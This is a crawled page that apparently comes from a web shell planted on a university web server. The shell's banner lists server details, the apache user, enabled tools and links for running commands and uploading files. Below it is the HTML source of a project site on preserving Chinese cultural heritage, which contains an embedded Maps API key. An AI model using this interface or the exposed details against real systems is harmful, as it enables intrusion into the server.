Server IP : 172.16.15.8 / Your IP : 3.144.42.174 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vnlaughlin/public_html/design/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title>ASIANetwork</title> <!-- Bootstrap Core CSS --> <link href="lib/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <!-- Custom Fonts --> <link href="lib/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href='https://fonts.googleapis.com/css?family=Cabin:700' rel='stylesheet' type='text/css'> <!-- Theme CSS --> <link href="css/grayscale.min.css" rel="stylesheet"> <!-- Temporary navbar container fix until Bootstrap 4 is patched --> <style> .navbar-toggler { z-index: 1; } @media (max-width: 576px) { nav > .container { width: 100%; } } </style> </head> <body id="page-top"> <!-- Navigation --> <nav id="mainNav" class="navbar fixed-top navbar-toggleable-md navbar-light"> <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarExample" aria-controls="navbarExample" aria-expanded="false" aria-label="Toggle navigation"> Menu <i class="fa fa-bars"></i> </button> <div class="container"> <a class="navbar-brand page-scroll" href="#page-top">ASIANetwork</a> <div class="collapse navbar-collapse" id="navbarExample"> <ul class="navbar-nav ml-auto"> <li class="nav-item"> <a class="nav-link page-scroll" href="user/login.php">Log In</a> </li> <li class="nav-item"> <a class="nav-link page-scroll" href="user/signup.php">Sign Up</a> </li> <li class="nav-item"> <a class="nav-link page-scroll" href="#download">Galleries</a> </li> <li class="nav-item"> <a class="nav-link page-scroll" href="#about">About</a> </li> </ul> </div> </div> </nav> <!-- Intro Header --> <header class="intro"> <div class="intro-body"> <section id="intro" class="container text-center"> <div class="row"> <div class="col-md-8 offset-md-2"> <h1 class="brand-heading">SAVING CHINA'S CULTURAL HERITAGE</h1> <p class="intro-text"> <br> <a href="user/login.php" class="btn btn-default btn-lg">Log In</a> or <a href="user/signup.php" class="btn btn-default btn-lg">Sign Up</a> </p> <a href="#about" class="btn btn-circle page-scroll"> <i class="fa fa-angle-double-down animated"></i> </a> </div> </div> </section> </div> </header> <!-- Download Section --> <section id="download" class="content-section text-center"> <div class="download-section"> <div class="container"> <div class="col-lg-8 offset-md-2"> <h2>Gallery</h2> <a href="galleries.php" class="btn btn-default btn-lg">Visit the Gallery</a> </div> </div> </div> </section> <!-- About Section --> <section id="about" class="container content-section text-center"> <div class="row"> <div class="col-lg-8 offset-md-2"> <h2>ABOUT OUR PROJECT</h2> <p>The project is funded by <a href="http://www.asianetwork.org/">ASIANetwork</a> and is a part of the Student-Faculty Fellows Program.</p> <p>The purpose of this database is to educate people about the Yungang Grottoes and Wutai Shan's cultural and religious significance, and the challenges involved in preserving them. This database contains educational information about each site (history, cultural importance, threats, and preservation efforts).</p> <p>It includes an extensive collection of digital images documenting the major features of the sites (including evidence of deterioration, preservation, and types of tourist activity).</p> <a href="http://www.asianetwork.org/2016/02/2016-sff-virginia-wesleyan-college/" class="btn btn-default btn-lg">More Info</a> </div> </div> </section> <!-- Contact Section --> <section id="contact" class="container content-section text-center"> <div class="row"> <div class="col-lg-8 offset-md-2"> <h2>Contact Start Bootstrap</h2> <p>Feel free to leave us a comment on the <a href="http://startbootstrap.com/template-overviews/grayscale/">Grayscale template overview page</a> on Start Bootstrap to give some feedback about this theme!</p> <ul class="list-inline banner-social-buttons"> <li class="list-inline-item"> <a href="https://twitter.com/SBootstrap" class="btn btn-default btn-lg"><i class="fa fa-twitter fa-fw"></i> <span class="network-name">Twitter</span></a> </li> <li class="list-inline-item"> <a href="https://github.com/BlackrockDigital/startbootstrap" class="btn btn-default btn-lg"><i class="fa fa-github fa-fw"></i> <span class="network-name">Github</span></a> </li> <li class="list-inline-item"> <a href="https://plus.google.com/+Startbootstrap/posts" class="btn btn-default btn-lg"><i class="fa fa-google-plus fa-fw"></i> <span class="network-name">Google+</span></a> </li> </ul> </div> </div> </section> <!-- Footer --> <footer> <div class="container text-center"> <p>Copyright © ASIANetwork 2017</p> </div> </footer> <!-- jQuery Version 3.1.1 --> <script src="lib/jquery/jquery.js"></script> <!-- Tether --> <script src="lib/tether/tether.min.js"></script> <!-- Bootstrap Core JavaScript --> <script src="lib/bootstrap/js/bootstrap.min.js"></script> <!-- Plugin JavaScript --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script> <!-- Google Maps API Key - Use your own API key to enable the map feature. More information on the Google Maps API can be found at https://developers.google.com/maps/ --> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCRngKslUGJTlibkQ3FkfTxj3Xss1UlZDA&sensor=false"></script> <!-- Theme JavaScript --> <script src="js/grayscale.min.js"></script> </body> </html>